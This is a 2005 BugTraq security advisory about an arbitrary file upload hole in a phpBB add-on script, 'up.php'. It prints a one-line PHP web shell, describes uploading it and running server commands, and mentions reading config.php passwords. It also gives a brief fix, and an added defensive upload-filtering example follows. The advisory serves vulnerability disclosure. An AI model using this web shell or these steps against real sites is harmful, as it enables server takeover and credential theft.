ecker1

Phpbb Upload Script "up.php" Arbitrary File Upload


To: BugTraq

Subject: phpBB Upload Script "up.php" Arbitrary File Upload

Date: Apr 8 2005 2:21AM

Author: Status-x <phr4xz gmail com>

Message-ID: <81ceb96d050407192175d0e344@mail.gmail.com>

 

 

#####################################################################

 

Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload"

 

$ Author: Status-x

$ Contact: phr4xz gmail com - status-x hackersoft net

$ Date: 7 April 2005

$ Website: http://forums.xisto.com/no_longer_exists/

$ Original Advisory: http://forums.xisto.com/no_longer_exists/

$ Risk: High

$ Vendor URL: https://www.phpbb.com/

 

$ Affected Software: phpBB 2.0.x

 

Note: Sorry if it has been posted before

 

#####################################################################

 

-= Description =-

 

phpBB is a forum system written in PHP which can support images, polls,
private messages and more

 

https://www.phpbb.com/

 

---------------------------------------------------------------------------

 

-= Vulnerabilities =-

 

 

- | "Arbitrary File Upload" |

 

 

In phpBB forums there is a script which can allow remote and registered
users to upload files with arbitrary content and with any extension.
I didn't find any website where I can download the script so I couldn't
check who made it.

 

 

 

- | Examples: |

 

 

We can create an example code to upload it to the "test site"

 

 

<?
system($cmd)
?>

 

 

And save it as cmd.php. Then we go to:

 

--------------------------

 

http://forums.xisto.com/no_longer_exists/

 

--------------------------

 

 

And upload our code; to see our file we just go to:

 

-----------------------------------

 

http://forums.xisto.com/no_longer_exists/

 

-----------------------------------

 

 

And we could see that our file has been uploaded:

 

 

 

Warning: system(): Cannot execute a blank command in

/home/target/public_html/forum/uploads/tetx.php on line 2

 

 

Then we can execute *NIX commands to obtain extremely compromising info
that could end with the "deface" of the affected site:

 

-----------------------------------------------------

 

Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP

Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux

/home/target/public_html/forum/uploads

uid=32029(target) gid=530(target) groups=530(target)

 

------------------------------------------------------

 

This is just an example of what can be done by a malicious attacker.

 

 

- | "Password Disclosure" |

 

 

The remote or local attacker can also read the config.php file, disclosing
the information about the DB and possibly the FTP password

 

 

------------------------------------------------------

 

Example

 

-= How to FIX =-

 

Just filter the allowed extensions of the uploaded files in the up.php
source.

 

 

-= Contact =-

 

Status-x

 

phr4xz gmail com

 

http://forums.xisto.com/no_longer_exists/

 

From url: http://www.securityfocus.com/archive/1/395351
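
One way to implement the extension filter suggested under "How to FIX", as an added example (not part of the original advisory and not the up.php source, which the page does not show). It goes a little beyond the advisory by also renaming the file server-side and storing it outside the web root; the form field name `userfile`, the allowlist and the storage path are assumptions.

```php
<?php
// Added example, not the original up.php: allowlist-based upload handling.
// Assumptions: form field "userfile"; storage directory outside the web root.

const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'txt', 'zip'];
const MAX_BYTES   = 2 * 1024 * 1024;
const STORE_DIR   = '/var/lib/forum-uploads';   // hypothetical path, not served over HTTP

/**
 * Returns the server-chosen name to store the file under, or null to reject.
 * Only the final extension of the client-supplied name is ever reused.
 */
function safe_upload_name(string $clientName, int $size): ?string
{
    if ($size <= 0 || $size > MAX_BYTES) {
        return null;
    }
    // Drop any path component (either separator) and refuse embedded NUL bytes.
    $base = basename(str_replace('\\', '/', $clientName));
    if (strpos($base, "\0") !== false) {
        return null;
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;   // rejects cmd.php, x.phtml, file.jpg.php, names with no extension
    }
    // Random name: "x.php.jpg" is stored as "<hex>.jpg", so no inner extension survives.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

function handle_upload(array $file): bool
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return false;
    }
    $name = safe_upload_name($file['name'], (int) $file['size']);
    if ($name === null) {
        return false;
    }
    return move_uploaded_file($file['tmp_name'], STORE_DIR . '/' . $name);
}

if (PHP_SAPI !== 'cli' && isset($_FILES['userfile'])) {
    http_response_code(handle_upload($_FILES['userfile']) ? 201 : 400);
}
```

An extension allowlist only helps if the web server never executes what is stored, which is why the example keeps uploads outside the document root; if they must live under it, script handlers should be disabled for that directory.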
